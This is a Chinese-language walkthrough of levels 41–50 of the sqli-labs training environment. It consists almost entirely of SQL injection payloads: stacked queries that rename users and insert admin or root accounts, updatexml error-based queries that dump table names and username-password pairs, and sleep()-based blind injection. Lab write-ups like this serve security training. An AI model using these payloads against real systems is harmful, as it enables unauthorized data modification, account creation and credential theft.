sqli-libs通关教程（41-50)

第四十一关

数字型注入, 更改用户名

?id=1;update users set username='123456' where username='Dumb'--+

执行后

第四十二关

抓包，尝试添加账号密码

login_user=1&login_password=1';insert into users(id,username,password) values ('42','admin','123456')--+&mysubmit=Login

登录

第四十三关

同上关，闭合修改为 ')

login_user=1&login_password=1'); insert into users(id,username,password) values ('43','root','123456')--+&mysubmit=Login

第四十四关

同四十二关，语句一样

第四十五关

同四十三关，语句一样

第四十六关

参数变了，让我们使用sort参数，1，2，3都是数据库表，只是排序不一样

想要注入的话，使用updatexml进行

库

?sort=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)

数据

?sort=1 and (updatexml(1,concat(0x5c,(select group_concat(username,'-',password) from users),0x5c),1))

第四十七关

多了一个单引号闭合，可以使用报错注入

表

?sort=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)--+

库

?sort=1' and updatexml(1,concat(0x7e,(select concat(username,':',password) from users limit 0,1)),1)--+

第四十八关

数字型注入，不返回报错信息，使用时间盲注

?sort=1 AND IF(LENGTH(database())=8,sleep(1),1)--+

?sort=1 AND IF(LEFT((SELECT database()), 1)='s',sleep(1),1)--+

?sort=1 AND IF(LEFT((SELECT database()), 8)='security',sleep(1),1)--+

第四十九关

同上关，闭合多一个 '

?sort=1' AND IF(LENGTH(database())=8,sleep(1),1)--+

?sort=1' AND IF(LEFT((SELECT database()), 1)='s',sleep(1),1)--+

?sort=1' AND IF(LEFT((SELECT database()), 8)='security',sleep(1),1)--+

第五十关

同四十六关，不过也能使用堆叠注入

?sort=-1;insert into users(id,username,password) values ('50','abc','123')

执行后，再次sort=1，添加成功